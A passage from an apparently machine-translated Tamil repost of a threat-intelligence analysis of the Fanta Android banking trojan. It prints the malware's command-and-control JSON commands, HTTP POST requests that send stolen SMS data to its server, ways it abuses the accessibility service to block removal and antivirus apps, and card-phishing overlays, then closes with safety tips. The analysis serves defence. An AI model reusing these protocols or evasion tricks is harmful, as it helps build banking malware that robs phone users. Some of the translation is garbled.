   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}
```
· அணி இடைவெளி அளவுருவை மாற்றவும்.
```
{
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}
```
· அணி இடைமறிப்பு அளவுருவை மாற்றவும்.
```
{
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}
```
· அணி SmsManager புலத்தை மாற்றவும்.
```
{
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```
· அணி பாதிக்கப்பட்ட சாதனத்திலிருந்து SMS செய்திகளை சேகரிக்கவும்.
```
{
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}
```
· அணி ஃபோனை தொழிற்சாலை அமைப்புகளுக்கு மீட்டமைக்கவும்:
```
{
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}
```
· அணி ReadDialog அமைப்பை மாற்றவும்.
```
{
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```

வகையுடன் ஒரு செய்தியை அனுப்புகிறது setSmsStatus. கட்டளையை செயல்படுத்திய பிறகு இந்த கோரிக்கை செய்யப்படுகிறது SMS செய்தியை அனுப்பவும். கோரிக்கை இதுபோல் தெரிகிறது:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

தரவுத்தளத்தின் உள்ளடக்கங்களை சமர்ப்பித்தல். ஒரு கோரிக்கைக்கு ஒரு சரம் மாற்றப்படும். பின்வரும் தரவு சேவையகத்திற்கு அனுப்பப்படுகிறது:
· குக்கீ - சேவையகத்திலிருந்து பெறப்பட்ட குக்கீகள்
· முறையில் - சரம் மாறிலி setSaveInboxSms
· முயற்சியில் - பாதிக்கப்பட்ட சாதனத்தின் ஐடி, கோரிக்கையை அனுப்பும்போது பெறப்பட்டது பதிவு_போட்
· உரை — தற்போதைய தரவுத்தள பதிவில் உள்ள உரை (புலம் d மேஜையில் இருந்து பதிவுகள் தரவுத்தளத்தில் а)
· எண் — தற்போதைய தரவுத்தள பதிவின் பெயர் (புலம் p மேஜையில் இருந்து பதிவுகள் தரவுத்தளத்தில் а)
· sms_mode - முழு எண் மதிப்பு (புலம் m மேஜையில் இருந்து பதிவுகள் தரவுத்தளத்தில் а)

கோரிக்கை இதுபோல் தெரிகிறது:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
```
சர்வரில் வெற்றிகரமாக சமர்ப்பித்ததும், அட்டவணையில் இருந்து வரிசை அகற்றப்படும். சேவையகத்தால் திருப்பியளிக்கப்பட்ட JSON பொருளின் எடுத்துக்காட்டு:
```
{
    "response":[],
    "status":"ok"
}
```

அணுகல் சேவையுடன் தொடர்பு

மாற்றுத்திறனாளிகள் ஆண்ட்ராய்டு சாதனங்களைப் பயன்படுத்துவதை எளிதாக்குவதற்காக அணுகல் சேவை செயல்படுத்தப்பட்டது. பெரும்பாலான சந்தர்ப்பங்களில், ஒரு பயன்பாட்டுடன் தொடர்பு கொள்ள உடல் தொடர்பு தேவைப்படுகிறது. அணுகல் சேவையானது அவற்றை நிரல் ரீதியாக உருவாக்க உங்களை அனுமதிக்கிறது. வங்கி பயன்பாடுகளில் போலி சாளரங்களை உருவாக்கவும், கணினி அமைப்புகள் மற்றும் சில பயன்பாடுகள் திறக்கப்படுவதைத் தடுக்கவும் Fanta சேவையைப் பயன்படுத்துகிறது.

அணுகல் சேவையின் செயல்பாட்டைப் பயன்படுத்தி, பாதிக்கப்பட்ட சாதனத்தின் திரையில் உள்ள உறுப்புகளில் ஏற்படும் மாற்றங்களை ட்ரோஜன் கண்காணிக்கிறது. முன்பு விவரிக்கப்பட்டபடி, உரையாடல் பெட்டிகளுடன் பதிவு செய்யும் செயல்பாடுகளுக்குப் பொறுப்பான அளவுருவை ஃபாண்டா அமைப்பு கொண்டுள்ளது - டயலாக் வாசிக்கவும். இந்த விருப்பம் அமைக்கப்பட்டால், நிகழ்வைத் தூண்டிய தொகுப்பின் பெயர் மற்றும் விளக்கம் பற்றிய தகவல்கள் தரவுத்தளத்தில் சேர்க்கப்படும். ட்ரோஜன் தூண்டப்படும்போது பின்வரும் செயல்களைச் செய்கிறது:

பின் மற்றும் வீட்டு விசை அழுத்தங்களை உருவகப்படுத்துகிறது:
· பயனர் தங்கள் சாதனத்தை மறுதொடக்கம் செய்ய விரும்பினால்
· பயனர் "Avito" பயன்பாட்டை நீக்க விரும்பினால் அல்லது அணுகல் உரிமைகளை மாற்ற வேண்டும்
· பக்கத்தில் "Avito" பயன்பாடு பற்றிய குறிப்பு இருந்தால்
· "Google Play Protect" பயன்பாட்டைத் திறக்கும்போது
· அணுகல் சேவை அமைப்புகளுடன் பக்கங்களைத் திறக்கும் போது
· கணினி பாதுகாப்பு உரையாடல் பெட்டி தோன்றும் போது
· "பிற பயன்பாட்டின் மீது வரையவும்" அமைப்புகளுடன் பக்கத்தைத் திறக்கும் போது
· "பயன்பாடுகள்", "காப்புப்பிரதி மற்றும் மீட்டமை", "தரவு மீட்டமை", "அமைப்புகளை மீட்டமை", "டெவலப்பர் பேனல்", "ஸ்பெக்" என்ற பக்கத்தைத் திறக்கும்போது. வாய்ப்புகள்", "அணுகல்", "சிறப்பு உரிமைகள்"
· நிகழ்வு சில பயன்பாடுகளால் உருவாக்கப்பட்டிருந்தால்.

விண்ணப்பப் பட்டியல்
- அண்ட்ராய்டு
- மாஸ்டர் லைட்
- சுத்தமான மாஸ்டர்
- x86 CPUக்கான சுத்தமான மாஸ்டர்
- Meizu விண்ணப்ப அனுமதி மேலாண்மை
- MIUI பாதுகாப்பு
- க்ளீன் மாஸ்டர் - வைரஸ் தடுப்பு & கேச் & ஜங்க் கிளீனர்
- பெற்றோர் கட்டுப்பாடு மற்றும் GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- வைரஸ் கிளீனர், வைரஸ் தடுப்பு, சுத்தப்படுத்தி (MAX பாதுகாப்பு)
- மொபைல் வைரஸ் தடுப்பு பாதுகாப்பு புரோ
- அவாஸ்ட் வைரஸ் தடுப்பு மற்றும் இலவச பாதுகாப்பு 2019
- மொபைல் பாதுகாப்பு MegaFon
- Xperia க்கான AVG பாதுகாப்பு
- மொபைல் பாதுகாப்பு
- மால்வேர்பைட்ஸ் வைரஸ் தடுப்பு & பாதுகாப்பு
- Android 2019க்கான வைரஸ் தடுப்பு
- பாதுகாப்பு மாஸ்டர் - வைரஸ் தடுப்பு, VPN, AppLock, பூஸ்டர்
- டேப்லெட் Huawei சிஸ்டம் மேனேஜருக்கான AVG வைரஸ் தடுப்பு
- சாம்சங் அணுகல்
- சாம்சங் ஸ்மார்ட் மேலாளர்
- பாதுகாப்பு மாஸ்டர்
- வேக பூஸ்டர்
- டாக்டர் வெப்
- Dr.Web பாதுகாப்பு இடம்
- டாக்டர்.வெப் மொபைல் கட்டுப்பாட்டு மையம்
- Dr.Web Security Space Life
- டாக்டர்.வெப் மொபைல் கட்டுப்பாட்டு மையம்
- வைரஸ் தடுப்பு மற்றும் மொபைல் பாதுகாப்பு
- காஸ்பர்ஸ்கி இணைய பாதுகாப்பு: வைரஸ் தடுப்பு மற்றும் பாதுகாப்பு
- காஸ்பர்ஸ்கி பேட்டரி ஆயுள்: சேவர் & பூஸ்டர்
- காஸ்பர்ஸ்கி எண்ட்பாயிண்ட் பாதுகாப்பு - பாதுகாப்பு மற்றும் மேலாண்மை
- AVG வைரஸ் தடுப்பு இலவசம் 2019 - Android க்கான பாதுகாப்பு
- வைரஸ் தடுப்பு அண்ட்ராய்டு
- நார்டன் மொபைல் பாதுகாப்பு மற்றும் வைரஸ் தடுப்பு
- வைரஸ் தடுப்பு, ஃபயர்வால், VPN, மொபைல் பாதுகாப்பு
- மொபைல் பாதுகாப்பு: வைரஸ் தடுப்பு, VPN, திருட்டு எதிர்ப்பு
- Android க்கான வைரஸ் தடுப்பு
ஒரு குறுகிய எண்ணுக்கு SMS செய்தியை அனுப்பும்போது அனுமதி கோரப்பட்டால், தேர்வுப்பெட்டியில் கிளிக் செய்வதை Fanta உருவகப்படுத்துகிறது தேர்வை நினைவில் கொள்ளுங்கள் மற்றும் பொத்தான் அனுப்ப.
ட்ரோஜனில் இருந்து நிர்வாகி உரிமைகளைப் பறிக்க முயலும்போது, அது தொலைபேசித் திரையைத் தடுக்கிறது.
புதிய நிர்வாகிகள் சேர்க்கப்படுவதைத் தடுக்கிறது.
வைரஸ் தடுப்பு பயன்பாடு என்றால் dr.web அச்சுறுத்தலைக் கண்டறிந்தது, ஃபாண்டா ஒரு பொத்தானை அழுத்துவதை உருவகப்படுத்துகிறது புறக்கணிக்கவும்.
ட்ரோஜன் நிகழ்வு பயன்பாட்டினால் உருவாக்கப்பட்டிருந்தால் பின் மற்றும் முகப்பு பொத்தானை அழுத்துவதை உருவகப்படுத்துகிறது சாம்சங் சாதன பராமரிப்பு.
சுமார் 30 வெவ்வேறு இணையச் சேவைகளின் பட்டியலிலிருந்து ஒரு பயன்பாடு தொடங்கப்பட்டால், வங்கி அட்டைகளைப் பற்றிய தகவல்களை உள்ளிடுவதற்கான படிவங்களுடன் ஃபிஷிங் சாளரங்களை Fanta உருவாக்குகிறது. அவற்றில்: AliExpress, புக்கிங், Avito, Google Play Market Component, Pandao, Drome Auto போன்றவை.

ஃபிஷிங் படிவங்கள்

பாதிக்கப்பட்ட சாதனத்தில் இயங்கும் பயன்பாடுகளை Fanta பகுப்பாய்வு செய்கிறது. ஆர்வமுள்ள விண்ணப்பம் திறக்கப்பட்டால், ட்ரோஜன் மற்றவற்றின் மேல் ஒரு ஃபிஷிங் சாளரத்தைக் காட்டுகிறது, இது வங்கி அட்டையைப் பற்றிய தகவலை உள்ளிடுவதற்கான ஒரு படிவமாகும். பயனர் பின்வரும் தரவை உள்ளிட வேண்டும்:
- அட்டை எண்
- அட்டை காலாவதி தேதி
- CVV
- அட்டைதாரரின் பெயர் (எல்லா வங்கிகளுக்கும் இல்லை)
இயங்கும் பயன்பாட்டைப் பொறுத்து, வெவ்வேறு ஃபிஷிங் சாளரங்கள் காண்பிக்கப்படும். அவற்றில் சிலவற்றின் எடுத்துக்காட்டுகள் பின்வருமாறு:

AliExpress:

அவிட்டோ:

போன்ற வேறு சில பயன்பாடுகளுக்கு Google Play Market, Aviasales, Pandao, Booking, Trivago:

அது உண்மையில் எப்படி இருந்தது

அதிர்ஷ்டவசமாக, கட்டுரையின் ஆரம்பத்தில் விவரிக்கப்பட்ட எஸ்எம்எஸ் செய்தியைப் பெற்ற நபர் இணைய பாதுகாப்பு நிபுணராக மாறினார். எனவே, உண்மையான, இயக்குனரல்லாத பதிப்பு முன்பு கூறப்பட்டதிலிருந்து வேறுபட்டது: நபர் ஒரு சுவாரஸ்யமான எஸ்எம்எஸ் பெற்றார், அதன் பிறகு அவர் குழு-IB அச்சுறுத்தல் வேட்டையாடும் புலனாய்வு குழுவிடம் கொடுத்தார். தாக்குதலின் விளைவு இந்த கட்டுரை. மகிழ்ச்சியான முடிவு, இல்லையா? இருப்பினும், எல்லா கதைகளும் அவ்வளவு சிறப்பாக முடிவடையவில்லை, மேலும் உங்களுடையது பண இழப்புடன் ஒரு இயக்குனரின் வெட்டு போல் தோன்றாது, பெரும்பாலான சந்தர்ப்பங்களில் பின்வரும் நீண்ட விவரிக்கப்பட்ட விதிகளை கடைபிடிப்பது போதுமானது:
- Google Playயைத் தவிர வேறு எந்த மூலத்திலிருந்தும் உங்கள் Android மொபைல் சாதனத்திற்கான பயன்பாடுகளை நிறுவ வேண்டாம்
- பயன்பாட்டை நிறுவும் போது, விண்ணப்பம் கோரும் உரிமைகளுக்கு சிறப்பு கவனம் செலுத்துங்கள்
- பதிவேற்றிய கோப்புகளின் நீட்டிப்புகளுக்கு கவனம் செலுத்துங்கள்
- Android OS புதுப்பிப்புகளை தவறாமல் நிறுவவும்
- சந்தேகத்திற்கிடமான ஆதாரங்களுக்குச் செல்ல வேண்டாம் மற்றும் அங்கிருந்து கோப்புகளைப் பதிவிறக்க வேண்டாம்
- எஸ்எம்எஸ் செய்திகளில் வரும் இணைப்புகளைக் கிளிக் செய்ய வேண்டாம்.

ஆதாரம்: www.habr.com

Leysya, Fanta: பழைய ஆண்ட்ராய்டு ட்ரோஜனுக்கான புதிய யுக்தி